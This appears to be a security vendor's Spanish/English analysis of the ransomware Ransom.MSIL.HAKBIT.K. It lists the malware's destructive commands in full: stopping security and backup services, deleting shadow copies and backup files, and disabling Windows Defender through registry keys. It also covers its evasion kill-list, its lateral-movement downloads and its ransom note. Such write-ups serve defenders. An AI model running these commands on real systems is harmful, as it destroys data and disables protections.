Ransom.MSIL.HAKBIT.K

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Se ejecuta y, a continuación, se elimina.

Detalles de entrada

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Instalación

Infiltra los archivos siguientes:

• %Desktop%\HOW_TO_DECYPHER_FILES.txt
• %User Temp%\HOW_TO_DECYPHER_FILES.txt
• {Encrypted Directory}\HOW_TO_DECYPHER_FILES.txt
• {malware filepath}\v.txt
• {malware filepath}\sf.txt
• %User Temp%\{random characters}.bat

(Nota: %Desktop% es la carpeta Escritorio del usuario activo, que en el caso de Windows 98 y ME suele estar en C:\Windows\Profiles\{nombre de usuario}\Escritorio, en el caso de Windows NT en C:\WINNT\Profiles\{nombre de usuario}\Escritorio, en el caso de Windows 2000(32-bit), XP y Server 2003(32-bit) en C:\Documents and Settings\{nombre de usuario}\Escritorio y en el caso de Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) y 10(64-bit) en C:\Users\{nombre de usuario}\Desktop).

Agrega los procesos siguientes:

• cmd.exe /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "%s" & Del /f /q "%s"
• cmd.exe /C choice /C Y /N /D Y /T 3& Del
• net.exe stop avpsus /y
• net.exe stop McAfeeDLPAgentService /y
• net.exe stop mfewc /y
• net.exe stop BMR Boot Service /y
• net.exe stop NetBackup BMR MTFTP Service /y
• net.exe stop DefWatch /y
• net.exe stop ccEvtMgr /y
• net.exe stop ccSetMgr /y
• net.exe stop SavRoam /y
• net.exe stop RTVscan /y
• net.exe stop QBFCService /y
• net.exe stop QBIDPService /y
• net.exe stop Intuit.QuickBooks.FCS /y
• net.exe stop QBCFMonitorService /y
• net.exe stop YooBackup /y
• net.exe stop YooIT /y
• net.exe stop zhudongfangyu /y
• net.exe stop stc_raw_agent /y
• net.exe stop VSNAPVSS /y
• net.exe stop VeeamTransportSvc /y
• net.exe stop VeeamDeploymentService /y
• net.exe stop VeeamNFSSvc /y
• net.exe stop veeam /y
• net.exe stop PDVFSService /y
• net.exe stop BackupExecVSSProvider /y
• net.exe stop BackupExecAgentAccelerator /y
• net.exe stop BackupExecAgentBrowser /y
• net.exe stop BackupExecDiveciMediaService /y
• net.exe stop BackupExecJobEngine /y
• net.exe stop BackupExecManagementService /y
• net.exe stop BackupExecRPCService /y
• net.exe stop AcrSch2Svc /y
• net.exe stop AcronisAgent /y
• net.exe stop CASAD2DWebSvc /y
• net.exe stop CAARCUpdateSvc /y
• net.exe stop sophos /y
• net.exe stop “Acronis VSS Provider” /y
• net.exe stop MsDtsServer /y
• net.exe stop IISAdmin /y
• net.exe stop MSExchangeES /y
• net.exe stop “Sophos Agent” /y
• net.exe stop EraserSvc11710 /y
• net.exe stop “Enterprise Client Service” /y
• net.exe stop “SQL Backups /y
• net.exe stop MsDtsServer100 /y
• net.exe stop NetMsmqActivator /y
• net.exe stop MSExchangeIS /y
• net.exe stop “Sophos AutoUpdate Service” /y
• net.exe stop SamSs /y
• net.exe stop ReportServer /y
• net.exe stop “SQLsafe Backup Service” /y
• net.exe stop MsDtsServer110 /y
• net.exe stop POP3Svc /y
• net.exe stop MSExchangeMGMT /y
• net.exe stop “Sophos Clean Service” /y
• net.exe stop SMTPSvc /y
• net.exe stop ReportServer$SQL_2008 /y
• net.exe stop “SQLsafe Filter Service” /y
• net.exe stop msftesql$PROD /y
• net.exe stop SstpSvc /y
• net.exe stop MSExchangeMTA /y
• net.exe stop “Sophos Device Control Service” /y
• net.exe stop ReportServer$SYSTEM_BGC /y
• net.exe stop “Symantec System Recovery” /y
• net.exe stop MSOLAP$SQL_2008 /y
• net.exe stop UI0Detect /y
• net.exe stop MSExchangeSA /y
• net.exe stop “Sophos File Scanner Service” /y
• net.exe stop ReportServer$TPS /y
• net.exe stop “Veeam Backup Catalog Data Service” /y
• net.exe stop MSOLAP$SYSTEM_BGC /y
• net.exe stop W3Svc /y
• net.exe stop MSExchangeSRS /y
• net.exe stop “Sophos Health Service” /y
• net.exe stop ReportServer$TPSAMA /y
• net.exe stop “Zoolz 2 Service” /y
• net.exe stop MSOLAP$TPS /y
• net.exe stop “aphidmonitorservice” /y
• net.exe stop msexchangeadtopology /y
• net.exe stop “Sophos MCS Agent” /y
• net.exe stop AcrSch2Svc /y
• net.exe stop MSOLAP$TPSAMA /y
• net.exe stop “intel(r) proset monitoring service” /y
• net.exe stop msexchangeimap4 /y
• net.exe stop “Sophos MCS Client” /y
• net.exe stop ARSM /y
• net.exe stop MSSQL$BKUPEXEC /y
• net.exe stop unistoresvc_1af40a /y
• net.exe stop “Sophos Message Router” /y
• net.exe stop BackupExecAgentAccelerator /y
• net.exe stop MSSQL$ECWDB2 /y
• net.exe stop audioendpointbuilder /y
• net.exe stop “Sophos Safestore Service” /y
• net.exe stop BackupExecAgentBrowser /y
• net.exe stop MSSQL$PRACTICEMGT /y
• net.exe stop “Sophos System Protection Service” /y
• net.exe stop BackupExecDeviceMediaService /y
• net.exe stop MSSQL$PRACTTICEBGC /y
• net.exe stop “Sophos Web Control Service” /y
• net.exe stop BackupExecJobEngine /y
• net.exe stop MSSQL$PROD /y
• net.exe stop AcronisAgent /y
• net.exe stop BackupExecManagementService /y
• net.exe stop MSSQL$PROFXENGAGEMENT /y
• net.exe stop Antivirus /y
• net.exe stop BackupExecRPCService /y
• net.exe stop MSSQL$SBSMONITORING /
• net.exe stop MSSQL$SBSMONITORING /y
• net.exe stop AVP /y
• net.exe stop BackupExecVSSProvider /y
• net.exe stop MSSQL$SHAREPOINT /y
• net.exe stop DCAgent /y
• net.exe stop bedbg /y
• net.exe stop MSSQL$SQL_2008 /y
• net.exe stop EhttpSrv /y
• net.exe stop MMS /y
• net.exe stop MSSQL$SQLEXPRESS /y
• net.exe stop ekrn /y
• net.exe stop mozyprobackup /y
• net.exe stop MSSQL$SYSTEM_BGC /y
• net.exe stop EPSecurityService /y
• net.exe stop MSSQL$VEEAMSQL2008R2 /y
• net.exe stop MSSQL$TPS /y
• net.exe stop EPUpdateService /y
• net.exe stop ntrtscan /y
• net.exe stop MSSQL$TPSAMA /y
• net.exe stop EsgShKernel /y
• net.exe stop PDVFSService /y
• net.exe stop MSSQL$VEEAMSQL2008R2 /y
• net.exe stop ESHASRV /y
• net.exe stop SDRSVC /y
• net.exe stop MSSQL$VEEAMSQL2012 /y
• net.exe stop FA_Scheduler /y
• net.exe stop SQLAgent$VEEAMSQL2008R2 /y
• net.exe stop MSSQLFDLauncher$PROFXENGAGEMENT /y
• net.exe stop KAVFS /y
• net.exe stop SQLWriter /y
• net.exe stop MSSQLFDLauncher$SBSMONITORING /y
• net.exe stop KAVFSGT /y
• net.exe stop VeeamBackupSvc /y
• net.exe stop MSSQLFDLauncher$SHAREPOINT /y
• net.exe stop kavfsslp /y
• net.exe stop VeeamBrokerSvc /y
• net.exe stop MSSQLFDLauncher$SQL_2008 /y
• net.exe stop klnagent /y
• net.exe stop VeeamCatalogSvc /y
• net.exe stop MSSQLFDLauncher$SYSTEM_BGC /y
• net.exe stop macmnsvc /y
• net.exe stop VeeamCloudSvc /y
• net.exe stop MSSQLFDLauncher$TPS /y
• net.exe stop masvc /y
• net.exe stop VeeamDeploymentService /y
• net.exe stop MSSQLFDLauncher$TPSAMA /y
• net.exe stop MBAMService /y
• net.exe stop VeeamDeploySvc /y
• net.exe stop MSSQLSERVER /y
• net.exe stop MBEndpointAgent /y
• net.exe stop VeeamEnterpriseManagerSvc /y
• net.exe stop MSSQLServerADHelper /y
• net.exe stop McAfeeEngineService /y
• net.exe stop VeeamHvIntegrationSvc /y
• net.exe stop MSSQLServerADHelper100 /y
• net.exe stop McAfeeFramework /y
• net.exe stop VeeamMountSvc /y
• net.exe stop MSSQLServerOLAPService /y
• net.exe stop McAfeeFrameworkMcAfeeFramework /y
• net.exe stop VeeamNFSSvc /y
• net.exe stop MySQL57 /y
• net.exe stop McShield /y
• net.exe stop VeeamRESTSvc /y
• net.exe stop MySQL80 /y
• net.exe stop McTaskManager /y
• net.exe stop VeeamTransportSvc /y
• net.exe stop OracleClientCache80 /y
• net.exe stop mfefire /y
• net.exe stop wbengine /y
• net.exe stop ReportServer$SQL_2008 /y
• net.exe stop mfemms /y
• net.exe stop wbengine /y
• net.exe stop RESvc /y
• net.exe stop mfevtp /y
• net.exe stop sms_site_sql_backup /y
• net.exe stop SQLAgent$BKUPEXEC /y
• net.exe stop MSSQL$SOPHOS /y
• net.exe stop SQLAgent$CITRIX_METAFRAME /y
• net.exe stop sacsvr /y
• net.exe stop SQLAgent$CXDB /y
• net.exe stop SAVAdminService /y
• net.exe stop SQLAgent$ECWDB2 /y
• net.exe stop SAVService /y
• net.exe stop SQLAgent$PRACTTICEBGC /y
• net.exe stop SepMasterService /y
• net.exe stop SQLAgent$PRACTTICEMGT /y
• net.exe stop ShMonitor /y
• net.exe stop SQLAgent$PROD /y
• net.exe stop Smcinst /y
• net.exe stop SQLAgent$PROFXENGAGEMENT /y
• net.exe stop SmcService /y
• net.exe stop SQLAgent$SBSMONITORING /y
• net.exe stop SntpService /y
• net.exe stop SQLAgent$SHAREPOINT /y
• net.exe stop sophossps /y
• net.exe stop SQLAgent$SQL_2008 /y
• net.exe stop SQLAgent$SOPHOS /y
• net.exe stop SQLAgent$SQLEXPRESS /y
• net.exe stop svcGenericHost /y
• net.exe stop SQLAgent$SYSTEM_BGC /y
• net.exe stop swi_filter /y
• net.exe stop SQLAgent$TPS /y
• net.exe stop swi_service /y
• net.exe stop SQLAgent$TPSAMA /y
• net.exe stop swi_update /y
• net.exe stop SQLAgent$VEEAMSQL2008R2 /y
• net.exe stop swi_update_64 /y
• net.exe stop SQLAgent$VEEAMSQL2012 /y
• net.exe stop TmCCSF /y
• net.exe stop SQLBrowser /y
• net.exe stop tmlisten /y
• net.exe stop SQLSafeOLRService /y
• net.exe stop TrueKey /y
• net.exe stop SQLSERVERAGENT /y
• net.exe stop TrueKeyScheduler /y
• net.exe stop SQLTELEMETRY /y
• net.exe stop TrueKeyServiceHelper /y
• net.exe stop SQLTELEMETRY$ECWDB2 /y
• net.exe stop WRSVC /y
• net.exe stop mssql$vim_sqlexp /y
• net.exe stop vapiendpoint /y
• sc.exe config SQLTELEMETRY start= disabled
• sc.exe config SQLTELEMETRY$ECWDB2 start= disabled
• sc.exe config SQLWriter start= disabled
• sc.exe config SstpSvc start= disabled
• taskkill.exe /IM mspub.exe /F
• taskkill.exe /IM mydesktopqos.exe /F
• taskkill.exe /IM mydesktopservice.exe /F
• taskkill.exe /IM mysqld.exe /F
• taskkill.exe /IM sqbcoreservice.exe /F
• taskkill.exe /IM firefoxconfig.exe /F
• taskkill.exe /IM agntsvc.exe /F
• taskkill.exe /IM thebat.exe /F
• taskkill.exe /IM steam.exe /F
• taskkill.exe /IM encsvc.exe /F
• taskkill.exe /IM excel.exe /F
• taskkill.exe /IM CNTAoSMgr.exe /F
• taskkill.exe /IM sqlwriter.exe /F
• taskkill.exe /IM tbirdconfig.exe /F
• taskkill.exe /IM dbeng50.exe /F
• taskkill.exe /IM thebat64.exe /F
• taskkill.exe /IM ocomm.exe /F
• taskkill.exe /IM infopath.exe /F
• taskkill.exe /IM mbamtray.exe /F
• taskkill.exe /IM zoolz.exe /F
• taskkill.exe IM thunderbird.exe /F
• taskkill.exe /IM dbsnmp.exe /F
• taskkill.exe /IM xfssvccon.exe /F
• taskkill.exe /IM mspub.exe /F
• taskkill.exe /IM Ntrtscan.exe /F
• taskkill.exe /IM isqlplussvc.exe /F
• taskkill.exe /IM onenote.exe /F
• taskkill.exe /IM PccNTMon.exe /F
• taskkill.exe /IM msaccess.exe /F
• taskkill.exe /IM outlook.exe /F
• taskkill.exe /IM tmlisten.exe /F
• taskkill.exe /IM msftesql.exe /F
• taskkill.exe /IM powerpnt.exe /F
• taskkill.exe /IM mydesktopqos.exe /F
• taskkill.exe /IM visio.exe /F
• taskkill.exe /IM mydesktopservice.exe /F
• taskkill.exe /IM winword.exe /F
• taskkill.exe /IM mysqld-nt.exe /F
• taskkill.exe /IM wordpad.exe /F
• taskkill.exe /IM mysqld-opt.exe /F
• taskkill.exe /IM ocautoupds.exe /F
• taskkill.exe /IM ocssd.exe /F
• taskkill.exe /IM oracle.exe /F
• taskkill.exe /IM sqlagent.exe /F
• taskkill.exe /IM sqlbrowser.exe /F
• taskkill.exe /IM sqlservr.exe /F
• taskkill.exe /IM synctime.exe /F
• vssadmin.exe Delete Shadows /all /quiet
• vssadmin.exe resize shadowstorage /for=c: /on=c: /maxsize=401MB
• vssadmin.exe resize shadowstorage /for=c: /on=c: /maxsize=unbounded
• vssadmin.exe resize shadowstorage /for=d: /on=d: /maxsize=401MB
• vssadmin.exe resize shadowstorage /for=d: /on=d: /maxsize=unbounded
• vssadmin.exe resize shadowstorage /for=e: /on=e: /maxsize=401MB
• vssadmin.exe resize shadowstorage /for=e: /on=e: /maxsize=unbounded
• vssadmin.exe resize shadowstorage /for=f: /on=f: /maxsize=401MB
• vssadmin.exe resize shadowstorage /for=f: /on=f: /maxsize=unbounded
• vssadmin.exe resize shadowstorage /for=g: /on=g: /maxsize=401MB
• vssadmin.exe resize shadowstorage /for=g: /on=g: /maxsize=unbounded
• vssadmin.exe resize shadowstorage /for=h: /on=h: /maxsize=401MB
• vssadmin.exe resize shadowstorage /for=h: /on=h: /maxsize=unbounded
• vssadmin.exe Delete Shadows /all /quiet
• del.exe /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
• del.exe /s /f /q d:\*.VHD d:\*.bac d:\*.bak d:\*.wbcat d:\*.bkf d:\Backup*.* d:\backup*.* d:\*.set d:\*.win d:\*.dsk
• del.exe /s /f /q e:\*.VHD e:\*.bac e:\*.bak e:\*.wbcat e:\*.bkf e:\Backup*.* e:\backup*.* e:\*.set e:\*.win e:\*.dsk
• del.exe /s /f /q f:\*.VHD f:\*.bac f:\*.bak f:\*.wbcat f:\*.bkf f:\Backup*.* f:\backup*.* f:\*.set f:\*.win f:\*.dsk
• del.exe /s /f /q g:\*.VHD g:\*.bac g:\*.bak g:\*.wbcat g:\*.bkf g:\Backup*.* g:\backup*.* g:\*.set g:\*.win g:\*.dsk
• del.exe /s /f /q h:\*.VHD h:\*.bac h:\*.bak h:\*.wbcat h:\*.bkf h:\Backup*.* h:\backup*.* h:\*.set h:\*.win h:\*.dsk
• "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
• net.exe use {ip address}
• cmd.exe /C %User Temp%\{random characters}.bat
• powershell "Get-MpPreference -verbose"
• notepad.exe %Desktop%\HOW_TO_DECYPHER_FILES.txt

(Nota: %User Temp% es la carpeta Temp del usuario activo, que en el caso de Windows 2000(32-bit), XP y Server 2003(32-bit) suele estar en C:\Documents and Settings\{nombre de usuario}\Local Settings\Temp y en el case de Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) y 10(64-bit) en C:\Users\{nombre de usuario}\AppData\Local\Temp).

Se ejecuta y, a continuación, se elimina.

Deja archivos de texto a modo de notas de rescate que contienen lo siguiente:

• HOW_TO_DECYPHER_FILES.txt
  

Agrega las siguientes exclusiones mutuas para garantizar que solo se ejecuta una de sus copias en todo momento:

• Global\1f4b7559-a3e9-4730-b500-72b90b2ebd56

Termina su ejecución cuando encuentra los siguientes procesos en la memoria del sistema afectado:

• http analyzer stand-alone
• fiddler
• effetech http sniffer
• firesheep
• IEWatch Professional
• dumpcap
• wireshark
• wireshark portable
• sysinternals tcpview
• NetworkMiner
• NetworkTrafficView
• HTTPNetworkSniffer
• tcpdump
• intercepter
• Intercepter-NG
• ollydbg
• x64dbg
• x32dbg
• dnspy
• dnspy-x86
• de4dot
• ilspy
• dotpeek
• dotpeek64
• ida64
• procexp
• procexp64
• RDG Packer Detector
• CFF Explorer
• PEiD
• protection_id
• LordPE
• pe-sieve
• MegaDumper
• UnConfuserEx
• Universal_Fixer
• NoFuserEx
• NetworkMiner
• NetworkTrafficView
• HTTPNetworkSniffer
• tcpdump
• intercepter
• Intercepter-NG

Técnica de inicio automático

Este malware infiltra el/los archivo(s) siguiente(s) en la carpeta de inicio del usuario de Windows para permitir su ejecución automática cada vez que se inicia el sistema:

• %User Startup%\mystartup.lnk -> points to %User Temp%\HOW_TO_DECYPHER_FILES.txt

(Nota: %User Temp% es la carpeta Temp del usuario activo, que en el caso de Windows 2000(32-bit), XP y Server 2003(32-bit) suele estar en C:\Documents and Settings\{nombre de usuario}\Local Settings\Temp y en el case de Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) y 10(64-bit) en C:\Users\{nombre de usuario}\AppData\Local\Temp).

Otras modificaciones del sistema

Agrega las siguientes entradas de registro:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows NT\CurrentVersion\Winlogon
LegalNoticeCaption = "Information..."

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows NT\CurrentVersion\Winlogon
LegalNoticeText = "Your files are encrypted... Don't worry, you can return all your files! To restore your files back write to this two mail: restorefilesencrypted@protonmail.com restorefilesencrypted@cock.li I will respond within 23 hours. come talk to me we will disscus about it and i help you to restore them back."

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Policies\
System
LocalAccountTokenFilterPolicy = 1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Policies\
System
EnableLinkedConnections = 1

Modifica las siguientes entradas de registro:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Features
TamperProtection = 0

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\Windows Defender
DisableAntiSpyware = 1

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\Windows Defender\Real-Time Protection
DisableBehaviorMonitoring = 1

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\Windows Defender\Real-Time Protection
DisableOnAccessProtection = 1

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\Windows Defender\Real-Time Protection
DisableScanOnRealtimeEnable = 1

Finalización del proceso

Finaliza los procesos siguientes si detecta que se ejecutan en la memoria del sistema afectado:

• http analyzer stand-alone
• fiddler
• effetech http sniffer
• firesheep
• IEWatch Professional
• dumpcap
• wireshark
• wireshark portable
• sysinternals tcpview
• NetworkMiner
• NetworkTrafficView
• HTTPNetworkSniffer
• tcpdump
• intercepter
• Intercepter-NG
• ollydbg
• x64dbg
• x32dbg
• dnspy
• dnspy-x86
• de4dot
• ilspy
• dotpeek
• dotpeek64
• ida64
• procexp
• procexp64
• RDG Packer Detector
• CFF Explorer
• PEiD
• protection_id
• LordPE
• pe-sieve
• MegaDumper
• UnConfuserEx
• Universal_Fixer
• NoFuserEx
• NetworkMiner
• NetworkTrafficView
• HTTPNetworkSniffer
• tcpdump
• intercepter
• Intercepter-NG

Rutina de descarga

Accede a los siguientes sitios Web para descargar archivos:

• https://raw.{BLOCKED}usercontent.com/d35ha/ProcessHide/master/bins/ProcessHide32.exe - if 32-bit
• https://raw.{BLOCKED}usercontent.com/d35ha/ProcessHide/master/bins/ProcessHide64.exe - if 64-bit
• https://www.{BLOCKED}dmin.com/paexec/paexec.exe

Guarda los archivos que descarga con los nombres siguientes:

• %User Temp%\{random characters}.exe

(Nota: %User Temp% es la carpeta Temp del usuario activo, que en el caso de Windows 2000(32-bit), XP y Server 2003(32-bit) suele estar en C:\Documents and Settings\{nombre de usuario}\Local Settings\Temp y en el case de Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) y 10(64-bit) en C:\Users\{nombre de usuario}\AppData\Local\Temp).

Robo de información

Recopila los siguientes datos:

• Mac Address of the infected machine and connected servers
• Shared Folder name
• Host Path of Shared Folder
• ip addresses associated with hostname
• ip addresses from Network Adapter Configuration

Otros detalles

Cifra los archivos con las extensiones siguientes:

• dat
• txt
• jpeg
• gif
• jpg
• png
• php
• cs
• cpp
• rar
• zip
• html
• htm
• xlsx
• xls
• avi
• mp4
• ppt
• doc
• docx
• sxi
• sxw
• odt
• hwp
• tar
• bz2
• mkv
• eml
• msg
• ost
• pst
• edb
• sql
• accdb
• mdb
• dbf
• odb
• myd
• php
• java
• cpp
• pas
• asm
• key
• pfx
• pem
• p12
• csr
• gpg
• aes
• vsd
• odg
• raw
• nef
• svg
• psd
• vmx
• vmdk
• vdi
• lay6
• sqlite3
• sqlitedb
• java
• class
• mpeg
• djvu
• tiff
• backup
• pdf
• cert
• docm
• xlsm
• dwg
• bak
• qbw
• nd
• tlg
• lgb
• pptx
• mov
• xdw
• ods
• wav
• mp3
• aiff
• flac
• m4a
• csv
• sql
• ora
• mdf
• ldf
• ndf
• dtsx
• rdl
• dim
• mrimg
• qbb
• rtf
• 7z

Hace lo siguiente:

• Clears Recycle Bin Contents
• Uses downloaded ProcessHide to hide itself from the following application-monitoring software:
  • Taskmgr
  • taskmgr
  • ProcessHacker
  • procexp
• Deletes backup files
• Displays the following text after restarting the system:
  
• Kills processes with large private memory space if their process name is not one of the following:
  • {malware process name}
  • opera
  • msedge
  • iexplore
  • firefox
  • explorer
  • wininit
• Modifies the following Windows Defender Actions for defense evasion:
  • DisableRealtimeMonitoring
  • DisableBehaviorMonitoring
  • DisableBlockAtFirstSeen
  • DisableIOAVProtection
  • DisablePrivacyMode
  • SignatureDisableUpdateOnStartupWithoutEngine
  • DisableArchiveScanning
  • DisableIntrusionPreventionSystem
  • DisableScriptScanning
  • SubmitSamplesConsent
  • MAPSReporting
  • HighThreatDefaultAction
  • ModerateThreatDefaultAction
  • LowThreatDefaultAction
  • SevereThreatDefaultAction
• Displays a balloon tip containing the following text:
  
• Uses downloaded paexec for lateral movement